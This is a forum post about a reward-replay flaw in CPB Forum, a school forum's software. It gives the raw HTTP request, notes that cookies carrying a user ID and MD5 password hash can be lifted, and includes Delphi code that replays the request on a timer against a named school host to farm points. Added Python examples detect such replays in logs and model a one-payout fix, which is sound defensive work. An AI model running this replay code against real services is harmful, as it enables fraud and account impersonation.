Our school's student forum runs on CPB Forum. Every post changes the poster's money or charm value, which is fun to watch. After a few posts I noticed that the page shown after posting also changes your money or charm every time you press F5, which explains how some novice users have so much money. Pressing F5 is too slow, though, so naturally I wrote a test program. It is actually very simple: the request is just an HTTP packet sent to the host through a socket.
GET /bbs/postfo.asp?t_id=3073&l_id=39&action=do HTTP/1.1
Accept: */*
Referer: http://stu.sdai.edu.cn/bbs/postfo.asp?t_id=3073&l_id=39&action=do
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: stu.sdai.edu.cn
Connection: Keep-Alive
Cookie: XPlinklinkfylogin=CPB; XplinkLinkFeiyue=userid=xxx&password=xxxxxxxxxxxxxxxx&username=xxxxxxxx; aspsessionidqqqqlcy=hdimhdmikgelgohojlnpkl
The server identifies the poster purely from the cookie: userid is the user's ID and password is the 16-character MD5 hash of the password; both can be read from the browser's Cookies folder. The main code is below. Since we only send the packet and never look at the response, a Timer control can be used to resend the constructed request string at a fixed interval.
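From the forum operator's side, this kind of replay is easy to spot in the web server logs: the same client fetches the identical `postfo.asp?...&action=do` URL many times within seconds, which a real user clicking through the forum never does. The following is an added example, not code from the original post or from CPB Forum; it parses a constructed sample of IIS-style log lines (date, time, client IP, method, URI stem, query) and flags any client that repeats one reward-granting request more than a threshold number of times inside a sliding window. The client IPs and timestamps are made up for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (not real forum traffic). Field order mirrors a minimal
# IIS W3C layout: date time c-ip cs-method cs-uri-stem cs-uri-query ("-" = no query).
SAMPLE_LOG = """\
2005-03-10 12:00:00 10.0.0.9 GET /bbs/index.asp -
2005-03-10 12:00:03 10.0.0.9 GET /bbs/postfo.asp t_id=3073&l_id=39&action=do
2005-03-10 12:00:10 10.0.0.5 GET /bbs/postfo.asp t_id=3073&l_id=39&action=do
2005-03-10 12:00:11 10.0.0.5 GET /bbs/postfo.asp t_id=3073&l_id=39&action=do
2005-03-10 12:00:12 10.0.0.5 GET /bbs/postfo.asp t_id=3073&l_id=39&action=do
2005-03-10 12:00:13 10.0.0.5 GET /bbs/postfo.asp t_id=3073&l_id=39&action=do
2005-03-10 12:00:14 10.0.0.5 GET /bbs/postfo.asp t_id=3073&l_id=39&action=do
2005-03-10 12:00:15 10.0.0.5 GET /bbs/postfo.asp t_id=3073&l_id=39&action=do
"""

LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) ?(\S*)$")


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, ip, method, stem, query = m.groups()
    if query == "-":
        query = ""
    return {
        "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
        "ip": ip,
        "method": method,
        "stem": stem,
        "query": query,
    }


def find_replays(log_text, window_seconds=60, threshold=5):
    """Flag (client, request) pairs that repeat a state-changing 'action=do' request
    at least `threshold` times within any `window_seconds` span. One alert per pair."""
    recent = defaultdict(deque)   # (ip, stem, query) -> timestamps inside the window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        # Only the reward-granting action matters; ordinary page views are ignored.
        if rec is None or "action=do" not in rec["query"]:
            continue
        key = (rec["ip"], rec["stem"], rec["query"])
        q = recent[key]
        q.append(rec["time"])
        # Drop timestamps that have slid out of the window.
        while (rec["time"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and key not in flagged:
            flagged.add(key)
            alerts.append({
                "ip": rec["ip"],
                "request": f"{rec['stem']}?{rec['query']}",
                "hits": len(q),
                "first": q[0],
                "last": rec["time"],
            })
    return alerts


if __name__ == "__main__":
    for a in find_replays(SAMPLE_LOG):
        print(f"{a['ip']} repeated {a['request']} {a['hits']}x "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

The threshold and window are deliberately loose; a genuine poster reaching the confirmation page once or twice never trips it, while a timer-driven client does within seconds. Keying on the full query string also catches replays against other post IDs, since each one is a separate key.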
RL := Chr(13) + Chr(10);
SendStr := 'GET /bbs/postfo.asp?t_id=3073&l_id=39&action=do HTTP/1.1' + RL +
  'Accept: */*' + RL +
  'Referer: http://stu.sdai.edu.cn/bbs/postfo.asp?t_id=3073&l_id=39&action=do' + RL +
  'Accept-Language: zh-cn' + RL +
  'Accept-Encoding: gzip, deflate' + RL +
  'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)' + RL +
  'Host: stu.sdai.edu.cn' + RL +
  'Connection: Keep-Alive' + RL +
  'Cookie: XPlinklinkfylogin=CPB; XPlinklinkfeiyue=userid=' + Edit5.Text +
  '&password=' + Edit2.Text + '&username=' + Edit1.Text +
  '; ASPSESSIONIDQGQQQLCY=HDIMHDCDMIKGELGOHOJLNPKL' + RL + RL + RL;
{ initialise the TcpClient }
TcpC1.RemoteHost := '202.194.85.2';
TcpC1.RemotePort := '80';
TcpC1.Open;
{ in the Timer's OnTimer handler: reconnect if needed, then send }
if not TcpC1.Connected then
  TcpC1.Connect;
TcpC1.Sendln(SendStr);
{ set the Timer's Interval according to the network speed }
That is all it takes to build such a simple point-farming tool. I hope the forum fixes this vulnerability.
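The underlying defect is that the confirmation page is a GET that pays out every time it is loaded, and the only thing tying the request to a user is a replayable cookie. The fix is on the server: the reward must be keyed to the post, granted at most once, and only to the post's author, so reloading or replaying the page is harmless. The following is an added example, not the forum's real code; it models the behaviour described above as `vulnerable_confirm_page` next to a hardened version, using an in-memory state object in place of the forum's database.

```python
from dataclasses import dataclass, field

REWARD_MONEY = 5   # assumed per-post payout, for illustration only
REWARD_CHARM = 1


@dataclass
class Account:
    user_id: str
    money: int = 0
    charm: int = 0


@dataclass
class ForumState:
    """Stand-in for the forum database (constructed for this example)."""
    accounts: dict = field(default_factory=dict)       # user_id -> Account
    posts: dict = field(default_factory=dict)          # post_id -> author user_id
    rewarded_posts: set = field(default_factory=set)   # post_ids already paid out


def vulnerable_confirm_page(state, user_id, post_id):
    """Models the behaviour the post describes: the 'action=do' page pays the
    cookie's user on every load, so F5 or a replayed GET pays again and again."""
    acct = state.accounts[user_id]
    acct.money += REWARD_MONEY
    acct.charm += REWARD_CHARM
    return acct, "granted"


def hardened_confirm_page(state, user_id, post_id):
    """Hardened version: pay once per post, and only to the post's author.
    In a real deployment the 'rewarded' flag lives in the post row and is set in
    the same transaction that inserts the post, so two concurrent loads cannot
    both pass the check."""
    acct = state.accounts[user_id]
    if state.posts.get(post_id) != user_id:
        return acct, "rejected"            # no such post, or not this user's post
    if post_id in state.rewarded_posts:
        return acct, "already-rewarded"    # idempotent: replay changes nothing
    state.rewarded_posts.add(post_id)
    acct.money += REWARD_MONEY
    acct.charm += REWARD_CHARM
    return acct, "granted"


def simulate(handler, replays=5):
    """Create one post, then load the confirmation page `replays` times
    (a reload or timer-driven replay). Returns the final money and charm."""
    state = ForumState()
    state.accounts["u1"] = Account("u1")
    state.accounts["u2"] = Account("u2")
    state.posts["3073"] = "u1"
    results = [handler(state, "u1", "3073")[1] for _ in range(replays)]
    # A second user replaying the same URL with their own cookie must get nothing.
    _, other = handler(state, "u2", "3073")
    acct = state.accounts["u1"]
    return {"money": acct.money, "charm": acct.charm,
            "results": results, "other_user": other,
            "other_money": state.accounts["u2"].money}


if __name__ == "__main__":
    print("vulnerable:", simulate(vulnerable_confirm_page))
    print("hardened:  ", simulate(hardened_confirm_page))
```

With the vulnerable handler five page loads are five payouts; with the hardened one the first load pays and the rest are no-ops, and a different account replaying the same URL is rejected outright. Moving the payout into post creation (a POST request, not a bookmarkable GET) removes the confirmation page as a reward trigger entirely.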